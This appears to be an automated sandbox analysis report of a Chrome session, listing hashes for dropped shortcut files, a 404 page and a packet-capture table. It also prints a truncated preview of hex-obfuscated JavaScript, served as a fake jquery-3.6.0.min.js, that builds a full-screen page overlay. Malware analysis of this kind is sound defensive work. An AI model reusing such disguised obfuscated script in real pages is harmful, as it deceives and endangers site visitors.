                      SSDEEP:48:8edvTTvCnHGidAKZdA14PLeh7sFiZUkmgqeh7sGy+BX:8a/CHn0y
                      MD5:5789A73ED0845850F9ED5C8C94F21E44
                      SHA1:A73740FE759260F92B60DC394CF52B4E2DA8C814
                      SHA-256:C10A4A66EAD437D89FE72CF69819C66BD246E36A72604697669E18B137B9696D
                      SHA-512:E3764E571582CD6264D410931EC7F64DCC6A30C50ED0BE6AFEB676E40B23AFEEB4602775B21652F5A3AB74C3557EB8BC77902D4B8ED793CB388436BE08DDB803
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,.....k........v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.q....O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2679
                      Entropy (8bit):3.989919206923258
                      Encrypted:false
                      SSDEEP:48:8ldvTTvVnHGidAKZdA1mLehDiZUkwqehMy+R:83/VEey
                      MD5:724E9C4D9E305C769DA21A6D68CFAD88
                      SHA1:D7106E4DC2375B876228168ED899563A438B0780
                      SHA-256:485087EE5B32285F154575EC4E41C19BD34D795A222D4F703C8DD038040B598F
                      SHA-512:D11A4908B04BE38AB2EC10E7FDA12D8886FDFE27A92D9FBB12927C02AB5021162830BEB9C83CECA2DDA029D8246713A5DC06503B11D0BB2B4EAE329BFC1CBD6F
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,.....,..(.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VJW......O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2679
                      Entropy (8bit):3.980034117174271
                      Encrypted:false
                      SSDEEP:48:8hdvTTvVnHGidAKZdA1oLehBiZUk1W1qehyy+C:8D/VU9Sy
                      MD5:8BC4BAD54F705CCD2F15223BD18BA15F
                      SHA1:82EE081E5DFC9F468BEEE790E07B0B473EAC280F
                      SHA-256:7214D31119D63722FA57F2648A006B2B21D8356E737FA787CAA529DA7030E60F
                      SHA-512:B117739DB9530B43C72E085C0CFF33293A5BE2B1971B6A946BC5360C74A8F3F187A9D51296779F6F9B414F4FBB8BB0A6F0B6681B2F9E55AA6CFDBC432ED3F749
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,....=Z..(.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VJW......O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2681
                      Entropy (8bit):3.9936222401408714
                      Encrypted:false
                      SSDEEP:48:8EdvTTvVnHGidAKZdA1duTBLehOuTbbiZUk5OjqehOuTb0y+yT+:8M/VpT6TbxWOvTb0y7T
                      MD5:8EBBDEEC73024A42D65651A3A7C024B4
                      SHA1:772CF8A00E47A29BE86C0685F535FD23382D1509
                      SHA-256:B3BF7E2C0C918B6A743A731EB85C2D84899A5F76259B128A4220AB89EBB72A31
                      SHA-512:150B002238E2E7C2B80E955C838068879C53990C051F0E73828197A2FBA0FC31BF5AE62D428510F31F760505977F1643CD5F133CA78042826A40AF2E9CDE6E00
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,........(.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VJW......O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (2790), with no line terminators
                      Category:downloaded
                      Size (bytes):2790
                      Entropy (8bit):4.014199679075213
                      Encrypted:false
                      SSDEEP:48:8gSj5JOcKOuAbJ8Y8TekEzJYWYuBCDZGkME4B42RDQuqTqyDq5+fAMzTg:8gU5JBKO5bYErBOGk54i2RDQLuymcIKg
                      MD5:2E51882E7E71D0BA057E01A1AE6EB27F
                      SHA1:187D28C005CCA065C209EDF3B879ECBC716865EE
                      SHA-256:CDB8068B3F61457084FE0B1534D4B634969965A9B7CEA1DE8331D2A7F904868E
                      SHA-512:4E938DA7C2EE83DA2E5EAD45C6B92079572D658173534C0168A275E592F066CC85DDF25B070EE7668AB41407AAF64DB6A8BBD8F6C134E916360A8D174B1C03F5
                      Malicious:false
                      Reputation:low
                      URL:https://abu.usaday.biz/jquery-3.6.0.min.js
                      Preview:var _0x5c71=["\x63\x38\x32\x32\x63\x31\x62\x36\x33\x38\x35\x33\x65\x64\x32\x37\x33\x62\x38\x39\x36\x38\x37\x61\x63\x35\x30\x35\x66\x39\x66\x61","\x37\x33\x38\x61\x61\x38\x64\x33\x62\x63\x30\x32\x65\x62\x38\x37\x31\x32\x61\x63\x64\x30\x65\x62\x32\x63\x66\x36\x64\x66\x64\x35","\x32\x34\x31\x66\x65\x38\x61\x66\x31\x65\x30\x33\x38\x31\x31\x38\x63\x64\x38\x31\x37\x30\x34\x38\x61\x36\x35\x66\x38\x30\x33\x65","\x62\x61\x39\x62\x66\x30\x35\x36\x39\x33\x62\x39\x66\x61\x32\x30\x32\x64\x39\x32\x32\x64\x64\x34\x33\x61\x30\x38\x66\x32\x38\x31","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x63\x73\x73\x54\x65\x78\x74","\x73\x74\x79\x6C\x65","\x77\x69\x64\x74\x68\x3A\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x31\x30\x30\x25\x3B\x20\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x66\x69\x78\x65\x64\x3B\x20\x6C\x65\x66\x74\x3A\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x30\x70\x78\x3B\x20\x7A\x2D\x
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):580
                      Entropy (8bit):4.8136327677200565
                      Encrypted:false
                      SSDEEP:12:TjeRHdHiHZdtklI5rPiCNGlTF5TF5TF5TF5TF5TFK:neRH988lTPTPTPTPTPTc
                      MD5:19BD47CCBB05E0D9EC3C0116300204D3
                      SHA1:495403F5ABA96F0A4451AD3871E0049153F8CD8A
                      SHA-256:9E3DAD9D075C73DC68D76BDFEE5A2400BB8DA07094C1059544B434177A8789F0
                      SHA-512:66BB2D5D37CD095ADF9DC6D33DBBF86B89B7149B4BCEC8BE7EC27014C536F436DCD142EFA96E3BB4C5C07570CC9D2D71F2D4669B1F7B8BDA183ED8EC0F2D1A9B
                      Malicious:false
                      Reputation:low
                      URL:https://abu.usaday.biz/favicon.ico
                      Preview:<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.10.3 (Ubuntu)</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                      No static file info

                      Download Network PCAP: filteredfull

                      • Total Packets: 160
                      • 443 (HTTPS)
                      • 80 (HTTP)
                      • 53 (DNS)
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 10, 2023 05:16:04.607671022 CEST49671443192.168.2.3204.79.197.203
                      Oct 10, 2023 05:16:07.529481888 CEST49676443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:07.529603004 CEST49677443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:07.529613972 CEST49675443192.168.2.3104.98.116.155
                      Oct 10, 2023 05:16:07.533260107 CEST49674443192.168.2.3173.222.162.43
                      Oct 10, 2023 05:16:07.935857058 CEST49672443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:09.387603045 CEST49681443192.168.2.320.189.173.5
                      Oct 10, 2023 05:16:09.420186996 CEST49671443192.168.2.3204.79.197.203
                      Oct 10, 2023 05:16:09.701385021 CEST49681443192.168.2.320.189.173.5
                      Oct 10, 2023 05:16:10.310745001 CEST49681443192.168.2.320.189.173.5
                      Oct 10, 2023 05:16:11.008964062 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.009043932 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.009135962 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.009923935 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.009988070 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.010052919 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.010270119 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.010301113 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.010468006 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.010500908 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.420255899 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.420350075 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.420519114 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.420563936 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.420644999 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.420670033 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.421189070 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.421257019 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.422481060 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.422488928 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.422564030 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.423753977 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.423753977 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.423830986 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.423999071 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.424005985 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.424314976 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.424401045 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.424477100 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.424491882 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.478318930 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.478451014 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.525217056 CEST49681443192.168.2.320.189.173.5
                      Oct 10, 2023 05:16:11.766113997 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.766561985 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.766644955 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.766906977 CEST49713443192.168.2.3142.250.72.174
                      Oct 10, 2023 05:16:11.766946077 CEST44349713142.250.72.174192.168.2.3
                      Oct 10, 2023 05:16:11.814753056 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.814831018 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.814893961 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.816134930 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:11.816216946 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.816313028 CEST49714443192.168.2.3142.250.217.141
                      Oct 10, 2023 05:16:11.816343069 CEST44349714142.250.217.141192.168.2.3
                      Oct 10, 2023 05:16:12.653964996 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:12.654057026 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:12.654150009 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:12.654505014 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:12.654541016 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.003983021 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.004307032 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.004339933 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.005387068 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.005465031 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.008788109 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.008860111 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.009388924 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.009407997 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.061278105 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.308012009 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:13.308264971 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:13.371685982 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.371714115 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.371911049 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.371932030 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.372118950 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.373002052 CEST49715443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.373044014 CEST44349715172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.457556963 CEST49717443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.457626104 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.457704067 CEST49717443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.458046913 CEST49717443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.458081007 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.792773008 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.793138981 CEST49717443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.793167114 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.793487072 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.793895006 CEST49717443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.793955088 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.794154882 CEST49717443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:13.838460922 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:13.932147026 CEST49681443192.168.2.320.189.173.5
                      Oct 10, 2023 05:16:14.173526049 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:14.173639059 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:14.173712969 CEST49717443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:14.177268982 CEST49717443192.168.2.3172.67.148.211
                      Oct 10, 2023 05:16:14.177318096 CEST44349717172.67.148.211192.168.2.3
                      Oct 10, 2023 05:16:14.341728926 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:14.341789961 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:14.341866016 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:14.342349052 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:14.342365026 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:14.700180054 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:14.700494051 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:14.700527906 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:14.701702118 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:14.701864004 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.012866020 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.012950897 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.012981892 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.013183117 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.071748018 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.071780920 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.118438005 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.236120939 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.236203909 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.236387014 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.239609957 CEST49718443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.239655018 CEST4434971835.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.241127968 CEST49719443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.241214037 CEST4434971935.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.241307020 CEST49719443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.241863012 CEST49719443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.241894960 CEST4434971935.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.267874956 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:15.267955065 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:15.268038988 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:15.268537998 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:15.268573046 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:15.597950935 CEST4434971935.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.598472118 CEST49719443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.598534107 CEST4434971935.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.598954916 CEST4434971935.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.599683046 CEST49719443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.599752903 CEST4434971935.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.600034952 CEST49719443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.635339022 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:15.636082888 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:15.636126041 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:15.637833118 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:15.637937069 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:15.639473915 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:15.639573097 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:15.642469883 CEST4434971935.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.680943966 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:15.680963993 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:15.727826118 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:15.988507032 CEST4434971935.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.988614082 CEST4434971935.190.80.1192.168.2.3
                      Oct 10, 2023 05:16:15.988913059 CEST49719443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.988914013 CEST49719443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:15.988914013 CEST49719443192.168.2.335.190.80.1
                      Oct 10, 2023 05:16:17.134116888 CEST49674443192.168.2.3173.222.162.43
                      Oct 10, 2023 05:16:17.134171963 CEST49676443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:17.134179115 CEST49675443192.168.2.3104.98.116.155
                      Oct 10, 2023 05:16:17.134210110 CEST49677443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:17.540744066 CEST49672443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:18.743846893 CEST49681443192.168.2.320.189.173.5
                      Oct 10, 2023 05:16:19.025278091 CEST49671443192.168.2.3204.79.197.203
                      Oct 10, 2023 05:16:25.629079103 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:25.629265070 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:25.629405975 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:26.154649973 CEST49720443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:16:26.154719114 CEST44349720172.217.12.132192.168.2.3
                      Oct 10, 2023 05:16:27.840143919 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:27.840178013 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:27.840274096 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:27.843182087 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:27.843190908 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:28.273758888 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.353467941 CEST49681443192.168.2.320.189.173.5
                      Oct 10, 2023 05:16:28.436680079 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.436989069 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.437091112 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.437093973 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.437149048 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.437222004 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.437278986 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.437284946 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.437638044 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.600338936 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.600392103 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.600452900 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.600487947 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.652381897 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.789794922 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:28.789899111 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:28.799215078 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:28.799228907 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:28.799742937 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:28.814735889 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.815145016 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.815212011 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.821551085 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.821625948 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.821851969 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.821921110 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.853382111 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:28.984286070 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.984306097 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.984321117 CEST44349709104.98.116.138192.168.2.3
